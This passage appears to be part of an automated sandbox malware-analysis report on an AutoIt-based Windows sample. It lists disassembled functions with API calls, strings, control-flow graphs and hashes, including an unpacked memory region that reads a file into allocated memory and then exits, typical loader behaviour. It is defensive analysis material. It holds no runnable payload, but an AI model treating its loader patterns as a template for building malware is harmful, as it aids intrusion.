                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                        • String ID: Include$PP$Software\AutoIt v3\AutoIt$\$\Include\
                                                        • API String ID: 2673923337-3586390629
                                                        • Opcode ID: 5de3b48eb0bdba58a9b8a2d81bc80c806085e29ac2ca995c511369b00ada2d2e
                                                        • Instruction ID: 152642a153147d2df9386290539e274d20fa62d45f543a7c01792bbf6c34ec0b
                                                        • Opcode Fuzzy Hash: 5de3b48eb0bdba58a9b8a2d81bc80c806085e29ac2ca995c511369b00ada2d2e
                                                        • Instruction Fuzzy Hash: D7718A71508305DEC304EF29EC45E6BBBE8FF88350F40496EF545872A1EB75A948CB92
                                                        Function 007C301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 007C3074
                                                        • RegisterClassExW.USER32(00000030), ref: 007C309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007C30AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 007C30CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007C30DC
                                                        • LoadIconW.USER32(000000A9), ref: 007C30F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007C3101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: b0967b28aa231bb2f143ffcdbcfdbec8fc16750aebf3a90acc95cdf4b44f0386
                                                        • Instruction ID: 3a58a20552b85720f442f521fbb613cd14bf2242acd26c7e2e6ebd8aa3074e46
                                                        • Opcode Fuzzy Hash: b0967b28aa231bb2f143ffcdbcfdbec8fc16750aebf3a90acc95cdf4b44f0386
                                                        • Instruction Fuzzy Hash: 253129B5940349EFDB50CFA8DC49ADABBF4FB09310F14412EE690E6261D7B90581CF91
                                                        Function 007C3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 007C3074
                                                        • RegisterClassExW.USER32(00000030), ref: 007C309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007C30AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 007C30CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007C30DC
                                                        • LoadIconW.USER32(000000A9), ref: 007C30F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007C3101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: a76d8bbe00693fa2591149b73e26b112431e61c2f965000560a3f9b4ce157b9b
                                                        • Instruction ID: ad943393f61fd954df02222991c7620f18195845984588c464cff8af2746fcff
                                                        • Opcode Fuzzy Hash: a76d8bbe00693fa2591149b73e26b112431e61c2f965000560a3f9b4ce157b9b
                                                        • Instruction Fuzzy Hash: A721C4B9D51658AFDB00DFA8EC89B9EBBF4FB09700F00412AFA10E62A1D7B54544CF91
                                                        Function 007C3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 007C3A50
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 007C3A5F
                                                        • LoadIconW.USER32(00000063), ref: 007C3A76
                                                        • LoadIconW.USER32(000000A4), ref: 007C3A88
                                                        • LoadIconW.USER32(000000A2), ref: 007C3A9A
                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007C3AC0
                                                        • RegisterClassExW.USER32(?), ref: 007C3B16
                                                          • Part of subcall function 007C3041: GetSysColorBrush.USER32(0000000F), ref: 007C3074
                                                          • Part of subcall function 007C3041: RegisterClassExW.USER32(00000030), ref: 007C309E
                                                          • Part of subcall function 007C3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007C30AF
                                                          • Part of subcall function 007C3041: InitCommonControlsEx.COMCTL32(?), ref: 007C30CC
                                                          • Part of subcall function 007C3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007C30DC
                                                          • Part of subcall function 007C3041: LoadIconW.USER32(000000A9), ref: 007C30F2
                                                          • Part of subcall function 007C3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007C3101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: 6a1babd99c0d4a674fd282fd3aab251c39e3d6fa5b74140867adffaf90f700dc
                                                        • Instruction ID: b318eee7c8c6d80b73378fb79c26fdc179444ad9e5e0210cac7b352ad2015e12
                                                        • Opcode Fuzzy Hash: 6a1babd99c0d4a674fd282fd3aab251c39e3d6fa5b74140867adffaf90f700dc
                                                        • Instruction Fuzzy Hash: 57214B75D00308AFEB10DFA8EC19B9D7FB1FB08711F00412AF604A62A2DBB95A50CF84
                                                        Function 007C3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 769 7c3633-7c3681 771 7c36e1-7c36e3 769->771 772 7c3683-7c3686 769->772 771->772 773 7c36e5 771->773 774 7c3688-7c368f 772->774 775 7c36e7 772->775 778 7c36ca-7c36d2 DefWindowProcW 773->778 776 7c374b-7c3753 PostQuitMessage 774->776 777 7c3695-7c369a 774->777 779 7c36ed-7c36f0 775->779 780 7fd0cc-7fd0fa call 7d1070 call 7d1093 775->780 784 7c3711-7c3713 776->784 782 7fd154-7fd168 call 822527 777->782 783 7c36a0-7c36a2 777->783 785 7c36d8-7c36de 778->785 786 7c3715-7c373c SetTimer RegisterWindowMessageW 779->786 787 7c36f2-7c36f3 779->787 813 7fd0ff-7fd106 780->813 782->784 806 7fd16e 782->806 789 7c36a8-7c36ad 783->789 790 7c3755-7c3764 call 7c44a0 783->790 784->785 786->784 791 7c373e-7c3749 CreatePopupMenu 786->791 793 7fd06f-7fd072 787->793 794 7c36f9-7c370c KillTimer call 7c443a call 7c3114 787->794 796 7fd139-7fd140 789->796 797 7c36b3-7c36b8 789->797 790->784 791->784 800 7fd0a8-7fd0c7 MoveWindow 793->800 801 7fd074-7fd076 793->801 794->784 796->778 811 7fd146-7fd14f call 817c36 796->811 804 7c36be-7c36c4 797->804 805 7fd124-7fd134 call 822d36 797->805 800->784 808 7fd078-7fd07b 801->808 809 7fd097-7fd0a3 SetFocus 801->809 804->778 804->813 805->784 806->778 808->804 814 7fd081-7fd092 call 7d1070 808->814 809->784 811->778 813->778 818 7fd10c-7fd11f call 7c443a call 7c434a 813->818 814->784 818->778
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 007C36D2
                                                        • KillTimer.USER32(?,00000001), ref: 007C36FC
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007C371F
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007C372A
                                                        • CreatePopupMenu.USER32 ref: 007C373E
                                                        • PostQuitMessage.USER32(00000000), ref: 007C374D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 129472671-2362178303
                                                        • Opcode ID: 19b867bd18d72a11cb5164cd87cf76c1cf9bca8f5bce6ea9da23cd2313998ade
                                                        • Instruction ID: 7e8d4c8366a6d4c67f456e577bc3a5a4cae48637ded7b1a51433f904a7fa39fa
                                                        • Opcode Fuzzy Hash: 19b867bd18d72a11cb5164cd87cf76c1cf9bca8f5bce6ea9da23cd2313998ade
                                                        • Instruction Fuzzy Hash: 4C4127B2200549FBDB246F68EC49F7A3B65FB01340F10412EF606E63A2DB6D9E5497A1
                                                        Function 007C3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                        • API String ID: 1825951767-3513169116
                                                        • Opcode ID: ff914032c60fe4a58377159a0cb8e111fea946366fbb63b052988a6934adde5a
                                                        • Instruction ID: 24223c4115f5fc9e2f37e854c50be7fcaf028f20acb1c94a81e0b851e10c04ba
                                                        • Opcode Fuzzy Hash: ff914032c60fe4a58377159a0cb8e111fea946366fbb63b052988a6934adde5a
                                                        • Instruction Fuzzy Hash: B4A13B7190022DDADB14EBA4DC99EEEB779FF14310F44442DE516A7192DF786A08CBA0
                                                        Function 00F74588 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 944 f74588-f74636 call f71f98 947 f7463d-f74663 call f75498 CreateFileW 944->947 950 f74665 947->950 951 f7466a-f7467a 947->951 952 f747b5-f747b9 950->952 959 f74681-f7469b VirtualAlloc 951->959 960 f7467c 951->960 953 f747fb-f747fe 952->953 954 f747bb-f747bf 952->954 956 f74801-f74808 953->956 957 f747c1-f747c4 954->957 958 f747cb-f747cf 954->958 963 f7485d-f74872 956->963 964 f7480a-f74815 956->964 957->958 965 f747d1-f747db 958->965 966 f747df-f747e3 958->966 961 f746a2-f746b9 ReadFile 959->961 962 f7469d 959->962 960->952 967 f746c0-f74700 VirtualAlloc 961->967 968 f746bb 961->968 962->952 971 f74874-f7487f VirtualFree 963->971 972 f74882-f7488a 963->972 969 f74817 964->969 970 f74819-f74825 964->970 965->966 973 f747e5-f747ef 966->973 974 f747f3 966->974 975 f74707-f74722 call f756e8 967->975 976 f74702 967->976 968->952 969->963 977 f74827-f74837 970->977 978 f74839-f74845 970->978 971->972 973->974 974->953 984 f7472d-f74737 975->984 976->952 980 f7485b 977->980 981 f74847-f74850 978->981 982 f74852-f74858 978->982 980->956 981->980 982->980 985 f7476a-f7477e call f754f8 984->985 986 f74739-f74768 call f756e8 984->986 991 f74782-f74786 985->991 992 f74780 985->992 986->984 994 f74792-f74796 991->994 995 f74788-f7478c CloseHandle 991->995 992->952 996 f747a6-f747af 994->996 997 f74798-f747a3 VirtualFree 994->997 995->994 996->947 996->952 997->996
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F74659
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F7487F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668345500.0000000000F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F71000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f71000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                        • Instruction ID: c62120050f66fa7ecc9adaf6727fe1e7efef99177ea347167b88aeeff3938374
                                                        • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                        • Instruction Fuzzy Hash: 1CA12874E00208EBDB14CFA4C894BEEB7B5BF49314F20815AE519BB280D775AE41DF62
                                                        Function 007C39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1075 7c39d5-7c3a45 CreateWindowExW * 2 ShowWindow * 2
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007C3A03
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007C3A24
                                                        • ShowWindow.USER32(00000000,?,?), ref: 007C3A38
                                                        • ShowWindow.USER32(00000000,?,?), ref: 007C3A41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: a8d8a67931e22fcfd95e90c0bfc690c53245e09f55750d414c9ea317e9df6cae
                                                        • Instruction ID: f204ff4380dd0383c575f1750f6da18b3a7e6ad43f6c9d1d69cde1d4851ba59a
                                                        • Opcode Fuzzy Hash: a8d8a67931e22fcfd95e90c0bfc690c53245e09f55750d414c9ea317e9df6cae
                                                        • Instruction Fuzzy Hash: 99F03A705402947EEA31572B6C08E2B3E7DF7C7F50F00002EBA00A2271CB650800CBB0
                                                        Function 00F74348 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1076 f74348-f74489 call f71f98 call f74238 CreateFileW 1083 f74490-f744a0 1076->1083 1084 f7448b 1076->1084 1087 f744a7-f744c1 VirtualAlloc 1083->1087 1088 f744a2 1083->1088 1085 f74540-f74545 1084->1085 1089 f744c5-f744dc ReadFile 1087->1089 1090 f744c3 1087->1090 1088->1085 1091 f744e0-f7451a call f74278 call f73238 1089->1091 1092 f744de 1089->1092 1090->1085 1097 f74536-f7453e ExitProcess 1091->1097 1098 f7451c-f74531 call f742c8 1091->1098 1092->1085 1097->1085 1098->1097
                                                        APIs
                                                          • Part of subcall function 00F74238: Sleep.KERNELBASE(000001F4), ref: 00F74249
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F7447F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668345500.0000000000F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F71000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f71000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: T7FN45UXXBVA9M473
                                                        • API String ID: 2694422964-2577079847
                                                        • Opcode ID: 30c58e58f9af1cca77b9ffd2a1ce0013458780ec5a05734609281c698148b565
                                                        • Instruction ID: c60f6954d6341c749abd34d6e2b220b57c207cc8a22cac2f6f540540f642e283
                                                        • Opcode Fuzzy Hash: 30c58e58f9af1cca77b9ffd2a1ce0013458780ec5a05734609281c698148b565
                                                        • Instruction Fuzzy Hash: BA51A131D04248EBEF11DBB4D854BEEBB79AF18700F144199E608BB2C1DBB91B44DB66
                                                        Function 007C407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1100 7c407c-7c4092 1101 7c416f-7c4173 1100->1101 1102 7c4098-7c40ad call 7c7a16 1100->1102 1105 7fd3c8-7fd3d7 LoadStringW 1102->1105 1106 7c40b3-7c40d3 call 7c7bcc 1102->1106 1109 7fd3e2-7fd3fa call 7c7b2e call 7c6fe3 1105->1109 1106->1109 1110 7c40d9-7c40dd 1106->1110 1119 7c40ed-7c416a call 7e2de0 call 7c454e call 7e2dbc Shell_NotifyIconW call 7c5904 1109->1119 1122 7fd400-7fd41e call 7c7cab call 7c6fe3 call 7c7cab 1109->1122 1112 7c4174-7c417d call 7c8047 1110->1112 1113 7c40e3-7c40e8 call 7c7b2e 1110->1113 1112->1119 1113->1119 1119->1101 1122->1119
                                                        APIs
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007FD3D7
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        • _memset.LIBCMT ref: 007C40FC
                                                        • _wcscpy.LIBCMT ref: 007C4150
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007C4160
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                        • String ID: Line:
                                                        • API String ID: 3942752672-1585850449
                                                        • Opcode ID: 5403d6c62b3fafdd3c23cfd9d8b060aaba4ccc01f4846195df30166fe20ec3ce
                                                        • Instruction ID: 4a3c177539daa2be07189022d5d493e9d160146957bf8613d7e3827cc522737e
                                                        • Opcode Fuzzy Hash: 5403d6c62b3fafdd3c23cfd9d8b060aaba4ccc01f4846195df30166fe20ec3ce
                                                        • Instruction Fuzzy Hash: 6931AD71008709AFD325EB64DC4AFDB77DCAF54310F10491EF685921A2EF78AA48CB96
                                                        Function 007C686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1135 7c686a-7c6891 call 7c4ddd 1138 7c6897-7c68a5 call 7c4ddd 1135->1138 1139 7fe031-7fe041 call 82955b 1135->1139 1138->1139 1146 7c68ab-7c68b1 1138->1146 1142 7fe046-7fe048 1139->1142 1144 7fe04a-7fe04d call 7c4e4a 1142->1144 1145 7fe067-7fe0af call 7e0db6 1142->1145 1148 7fe052-7fe061 call 8242f8 1144->1148 1156 7fe0d4 1145->1156 1157 7fe0b1-7fe0bb 1145->1157 1147 7c68b7-7c68d9 call 7c6a8c 1146->1147 1146->1148 1148->1145 1159 7fe0d6-7fe0e9 1156->1159 1158 7fe0cf-7fe0d0 1157->1158 1160 7fe0bd-7fe0cc 1158->1160 1161 7fe0d2 1158->1161 1162 7fe0ef 1159->1162 1163 7fe260-7fe263 call 7e2d55 1159->1163 1160->1158 1161->1159 1165 7fe0f6-7fe0f9 call 7c7480 1162->1165 1166 7fe268-7fe271 call 7c4e4a 1163->1166 1169 7fe0fe-7fe120 call 7c5db2 call 8273e9 1165->1169 1172 7fe273-7fe283 call 7c7616 call 7c5d9b 1166->1172 1179 7fe134-7fe13e call 8273d3 1169->1179 1180 7fe122-7fe12f 1169->1180 1188 7fe288-7fe2b8 call 81f7a1 call 7e0e2c call 7e2d55 call 7c4e4a 1172->1188 1186 7fe158-7fe162 call 8273bd 1179->1186 1187 7fe140-7fe153 1179->1187 1182 7fe227-7fe237 call 7c750f 1180->1182 1182->1169 1192 7fe23d-7fe247 call 7c735d 1182->1192 1196 7fe176-7fe180 call 7c5e2a 1186->1196 1197 7fe164-7fe171 1186->1197 1187->1182 1188->1172 1199 7fe24c-7fe25a 1192->1199 1196->1182 1205 7fe186-7fe19e call 81f73d 1196->1205 1197->1182 1199->1163 1199->1165 1210 7fe1c1-7fe1c4 1205->1210 1211 7fe1a0-7fe1bf call 7c7de1 call 7c5904 1205->1211 1212 7fe1c6-7fe1e1 call 7c7de1 call 7c6839 call 7c5904 1210->1212 1213 7fe1f2-7fe1f5 1210->1213 1234 7fe1e2-7fe1f0 call 7c5db2 1211->1234 1212->1234 1217 7fe1f7-7fe200 call 81f65e 1213->1217 1218 7fe215-7fe218 call 82737f 1213->1218 1217->1188 1227 7fe206-7fe210 call 7e0e2c 1217->1227 1225 7fe21d-7fe226 call 7e0e2c 1218->1225 1225->1182 1227->1169 1234->1225
                                                        APIs
                                                          • Part of subcall function 007C4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007C4E0F
                                                        • _free.LIBCMT ref: 007FE263
                                                        • _free.LIBCMT ref: 007FE2AA
                                                          • Part of subcall function 007C6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007C6BAD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                        • API String ID: 2861923089-1757145024
                                                        • Opcode ID: f6079ab6aa4b517b1db52dabc8856967156789a36862dedbe042a18d890fea6f
                                                        • Instruction ID: 56fd22d4452df419e7aec4a075230a4d8d0384548fca18b27143922cbb9a86cc
                                                        • Opcode Fuzzy Hash: f6079ab6aa4b517b1db52dabc8856967156789a36862dedbe042a18d890fea6f
                                                        • Instruction Fuzzy Hash: 2B913B7190021DEFCF04EFA4CC959EDB7B8FF09310B10442DE916AB2A1DB79A945CB50
                                                        Function 007C35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007C35A1,SwapMouseButtons,00000004,?), ref: 007C35D4
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007C35A1,SwapMouseButtons,00000004,?,?,?,?,007C2754), ref: 007C35F5
                                                        • RegCloseKey.KERNELBASE(00000000,?,?,007C35A1,SwapMouseButtons,00000004,?,?,?,?,007C2754), ref: 007C3617
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
